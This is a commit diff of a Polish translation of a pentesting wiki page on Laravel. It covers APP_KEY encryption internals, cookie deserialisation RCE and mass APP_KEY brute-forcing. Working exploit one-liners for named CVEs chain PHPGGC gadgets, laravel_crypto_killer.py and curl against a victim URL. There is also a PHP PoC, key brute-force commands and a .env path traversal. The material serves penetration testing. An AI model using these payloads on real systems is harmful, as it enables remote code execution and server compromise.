maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/laravel.md']

Browse Source
This commit is contained in:
Translator 2025-08-04 22:31:09 +00:00
parent abd01927e1
commit 635f82dd24
1 changed files with 39 additions and 105 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

144
src/network-services-pentesting/pentesting-web/laravel.md
View File

@ -20,9 +20,11 @@ Surowy tekst szyfrowany, który ostatecznie **jest wysyłany do klienta**, to **
"tag" : "" // only used for AEAD ciphers (GCM)
}
```
`encrypt($value, $serialize=true)` domyślnie `serialize()` tekst jawny, podczas gdy `decrypt($payload, $unserialize=true)` **automatycznie `unserialize()`** odszyfrowaną wartość. Dlatego **każdy atakujący, który zna 32-bajtowy sekret `APP_KEY`, może stworzyć zaszyfrowany obiekt PHP zserializowany i uzyskać RCE za pomocą metod magicznych (`__wakeup`, `__destruct`, …)**.
`encrypt($value, $serialize=true)` domyślnie `serialize()` tekst jawny, podczas gdy
`decrypt($payload, $unserialize=true)` **automatycznie `unserialize()`** odszyfrowaną wartość.
Dlatego **każdy atakujący, który zna 32-bajtowy sekret `APP_KEY`, może stworzyć zaszyfrowany obiekt PHP zserializowany i uzyskać RCE za pomocą metod magicznych (`__wakeup`, `__destruct`, …)**.
Minimalne PoC (framework ≥9.x):
Minimalny PoC (framework ≥9.x):
```php
use Illuminate\Support\Facades\Crypt;
@ -54,38 +56,48 @@ Skrypt transparentnie obsługuje zarówno ładunki CBC, jak i GCM oraz regeneruj
| Projekt | Podatny punkt | Łańcuch gadżetów |
|---------|-----------------|--------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | Ciasteczko `XSRF-TOKEN`, gdy `Passport::withCookieSerialization()` jest włączone | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie`ciasteczko `laravel_session` | Laravel/RCE15 |
| Snipe-IT ≤v6 (CVE-2024-48987) | `XSRF-TOKEN` cookie, gdy `Passport::withCookieSerialization()` jest włączone | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie``laravel_session` cookie | Laravel/RCE15 |
Workflow eksploatacji zawsze wygląda następująco:
1. Uzyskaj `APP_KEY` (domyślne przykłady, wyciek z Git, wyciek config/.env lub brute-force)
2. Wygeneruj gadżet za pomocą **PHPGGC**
3. `laravel_crypto_killer.py encrypt …`
4. Dostarcz ładunek przez podatny parametr/ciasteczko → **RCE**
1. Uzyskaj lub wymuś 32-bajtowy `APP_KEY`.
2. Zbuduj łańcuch gadżetów za pomocą **PHPGGC** (na przykład `Laravel/RCE13`, `Laravel/RCE9` lub `Laravel/RCE15`).
3. Szyfruj zserializowany gadżet za pomocą **laravel_crypto_killer.py** i odzyskanego `APP_KEY`.
4. Dostarcz szyfrogram do podatnego punktu `decrypt()` (parametr trasy, cookie, sesja …), aby wywołać **RCE**.
Poniżej znajdują się zwięzłe jednowiersze demonstrujące pełną ścieżkę ataku dla każdego z wymienionych powyżej CVE w rzeczywistym świecie:
```bash
# Invoice Ninja ≤5 /route/{hash}
php8.2 phpggc Laravel/RCE13 system id -b -f | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - | \
xargs -I% curl "https://victim/route/%"
# Snipe-IT ≤6 XSRF-TOKEN cookie
php7.4 phpggc Laravel/RCE9 system id -b | \
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v - > xsrf.txt
curl -H "Cookie: XSRF-TOKEN=$(cat xsrf.txt)" https://victim/login
# Crater cookie-based session
php8.2 phpggc Laravel/RCE15 system id -b > payload.bin
./laravel_crypto_killer.py encrypt -k <APP_KEY> -v payload.bin --session_cookie=<orig_hash> > forged.txt
curl -H "Cookie: laravel_session=<orig>; <cookie_name>=$(cat forged.txt)" https://victim/login
```
---
## Masowe odkrywanie APP_KEY za pomocą brute-force ciasteczek
## Odkrywanie APP_KEY na masową skalę za pomocą brute-force ciasteczek
Ponieważ każda świeża odpowiedź Laravel ustawia co najmniej 1 zaszyfrowane ciasteczko (`XSRF-TOKEN` i zazwyczaj `laravel_session`), **publiczne skanery internetowe (Shodan, Censys, …) ujawniają miliony szyfrogramów**, które można atakować offline.
Ponieważ każda nowa odpowiedź Laravel ustawia przynajmniej 1 zaszyfrowane ciasteczko (`XSRF-TOKEN` i zazwyczaj `laravel_session`), **publiczne skanery internetowe (Shodan, Censys, …) ujawniają miliony szyfrogramów**, które można atakować offline.
Kluczowe ustalenia badań opublikowanych przez Synacktiv (2024-2025):
* Zbiór danych lipiec 2024 » 580 k tokenów, **3,99 % kluczy złamanych** (≈23 k)
* Zbiór danych maj 2025 » 625 k tokenów, **3,56 % kluczy złamanych**
* >1 000 serwerów nadal podatnych na przestarzałe CVE-2018-15133, ponieważ tokeny bezpośrednio zawierają zserializowane dane.
* Ogromne ponowne użycie kluczy Top-10 APP_KEYów to domyślne wartości zakodowane w komercyjnych szablonach Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
* Ogromne ponowne użycie kluczy 10 najlepszych APP_KEYów to domyślne wartości zakodowane w komercyjnych szablonach Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
Prywatne narzędzie Go **nounours** zwiększa wydajność brute-force AES-CBC/GCM do ~1,5 miliarda prób/s, redukując łamanie pełnego zbioru danych do <2 minut.
---
## Odniesienia
* [Laravel: analiza wycieku APP_KEY](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 opis (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
## Laravel Tricks
## Sztuczki Laravel
### Tryb debugowania
@ -94,11 +106,11 @@ Na przykład `http://127.0.0.1:8000/profiles`:
![](<../../images/image (1046).png>)
Jest to zazwyczaj potrzebne do eksploatacji innych CVE RCE Laravel.
Jest to zazwyczaj potrzebne do wykorzystywania innych CVE RCE Laravel.
### .env
Laravel zapisuje APP, którego używa do szyfrowania ciasteczek i innych poświadczeń w pliku o nazwie `.env`, do którego można uzyskać dostęp za pomocą pewnego przejścia ścieżki pod: `/../.env`
Laravel zapisuje APP, której używa do szyfrowania ciasteczek i innych poświadczeń w pliku o nazwie `.env`, do którego można uzyskać dostęp za pomocą pewnego przejścia ścieżki pod: `/../.env`
Laravel pokaże również te informacje na stronie debugowania (która pojawia się, gdy Laravel napotyka błąd i jest aktywowana).
@ -169,98 +181,20 @@ Wersje podatne: 5.5.40 oraz 5.6.x do 5.6.29 ([https://www.cvedetails.com/cve/CVE
Tutaj możesz znaleźć informacje o podatności na deserializację: [https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce/)
Możesz to przetestować i wykorzystać używając [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Lub możesz również wykorzystać to z metasploit: `use unix/http/laravel_token_unserialize_exec`
Możesz to przetestować i wykorzystać, używając [https://github.com/kozmic/laravel-poc-CVE-2018-15133](https://github.com/kozmic/laravel-poc-CVE-2018-15133)\
Lub możesz to również wykorzystać z metasploit: `use unix/http/laravel_token_unserialize_exec`
### CVE-2021-3129
Inna deserializacja: [https://github.com/ambionics/laravel-exploits](https://github.com/ambionics/laravel-exploits)
### Laravel SQLInjection
Przeczytaj informacje o tym tutaj: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
### Laravel SQLInjection
Przeczytaj informacje o tym tutaj: [https://stitcher.io/blog/unsafe-sql-functions-in-laravel](https://stitcher.io/blog/unsafe-sql-functions-in-laravel)
---
## APP_KEY & Wnętrza szyfrowania (Laravel \u003e=5.6)
Laravel używa AES-256-CBC (lub GCM) z integralnością HMAC w tle (`Illuminate\\Encryption\\Encrypter`).
Surowy szyfrogram, który ostatecznie **jest wysyłany do klienta**, to **Base64 obiektu JSON** jak:
```json
{
"iv" : "Base64(random 16-byte IV)",
"value": "Base64(ciphertext)",
"mac" : "HMAC_SHA256(iv||value, APP_KEY)",
"tag" : "" // only used for AEAD ciphers (GCM)
}
```
`encrypt($value, $serialize=true)` domyślnie `serialize()` tekst jawny, podczas gdy `decrypt($payload, $unserialize=true)` **automatycznie `unserialize()`** odszyfrowaną wartość. Dlatego **każdy atakujący, który zna 32-bajtowy sekret `APP_KEY`, może stworzyć zaszyfrowany obiekt PHP zserializowany i uzyskać RCE za pomocą metod magicznych (`__wakeup`, `__destruct`, …)**.
Minimalne PoC (framework ≥9.x):
```php
use Illuminate\Support\Facades\Crypt;
$chain = base64_decode('<phpggc-payload>'); // e.g. phpggc Laravel/RCE13 system id -b -f
$evil = Crypt::encrypt($chain); // JSON->Base64 cipher ready to paste
```
Wstrzyknij wygenerowany ciąg do dowolnego podatnego `decrypt()` sinka (parametr trasy, cookie, sesja, …).
---
## laravel-crypto-killer 🧨
[laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer) automatyzuje cały proces i dodaje wygodny tryb **bruteforce**:
```bash
# Encrypt a phpggc chain with a known APP_KEY
laravel_crypto_killer.py encrypt -k "base64:<APP_KEY>" -v "$(phpggc Laravel/RCE13 system id -b -f)"
# Decrypt a captured cookie / token
laravel_crypto_killer.py decrypt -k <APP_KEY> -v <cipher>
# Try a word-list of keys against a token (offline)
laravel_crypto_killer.py bruteforce -v <cipher> -kf appkeys.txt
```
Skrypt transparentnie obsługuje zarówno ładunki CBC, jak i GCM oraz regeneruje pole HMAC/tag.
---
## Wzorce podatności w rzeczywistym świecie
| Projekt | Podatny punkt | Łańcuch gadżetów |
|---------|-----------------|--------------|
| Invoice Ninja ≤v5 (CVE-2024-55555) | `/route/{hash}``decrypt($hash)` | Laravel/RCE13 |
| Snipe-IT ≤v6 (CVE-2024-48987) | Ciasteczko `XSRF-TOKEN`, gdy `Passport::withCookieSerialization()` jest włączone | Laravel/RCE9 |
| Crater (CVE-2024-55556) | `SESSION_DRIVER=cookie` → ciasteczko `laravel_session` | Laravel/RCE15 |
Workflow eksploatacji zawsze wygląda następująco:
1. Uzyskaj `APP_KEY` (domyślne przykłady, wyciek z Git, wyciek config/.env lub brute-force)
2. Wygeneruj gadżet za pomocą **PHPGGC**
3. `laravel_crypto_killer.py encrypt …`
4. Dostarcz ładunek przez podatny parametr/ciasteczko → **RCE**
---
## Masowe odkrywanie APP_KEY za pomocą brute-force ciasteczek
Ponieważ każda świeża odpowiedź Laravel ustawia co najmniej 1 zaszyfrowane ciasteczko (`XSRF-TOKEN` i zazwyczaj `laravel_session`), **publiczne skanery internetowe (Shodan, Censys, …) ujawniają miliony szyfrogramów**, które można atakować offline.
Kluczowe ustalenia badań opublikowanych przez Synacktiv (2024-2025):
* Zbiór danych lipiec 2024 » 580 k tokenów, **3,99 % kluczy złamanych** (≈23 k)
* Zbiór danych maj 2025 » 625 k tokenów, **3,56 % kluczy złamanych**
* >1 000 serwerów nadal podatnych na przestarzałe CVE-2018-15133, ponieważ tokeny bezpośrednio zawierają zserializowane dane.
* Ogromne ponowne użycie kluczy Top-10 APP_KEYów to domyślne wartości zakodowane w komercyjnych szablonach Laravel (UltimatePOS, Invoice Ninja, XPanel, …).
Prywatne narzędzie Go **nounours** zwiększa wydajność brute-force AES-CBC/GCM do ~1,5 miliarda prób/s, redukując łamanie pełnego zbioru danych do <2 minut.
---
## Odniesienia
* [Laravel: analiza wycieku APP_KEY](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
## References
* [Laravel: APP_KEY leakage analysis (EN)](https://www.synacktiv.com/publications/laravel-appkey-leakage-analysis.html)
* [Laravel : analyse de fuite dAPP_KEY (FR)](https://www.synacktiv.com/publications/laravel-analyse-de-fuite-dappkey.html)
* [laravel-crypto-killer](https://github.com/synacktiv/laravel-crypto-killer)
* [PHPGGC PHP Generic Gadget Chains](https://github.com/ambionics/phpggc)
* [CVE-2018-15133 opis (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
* [CVE-2018-15133 write-up (WithSecure)](https://labs.withsecure.com/archive/laravel-cookie-forgery-decryption-and-rce)
{{#include ../../banners/hacktricks-training.md}}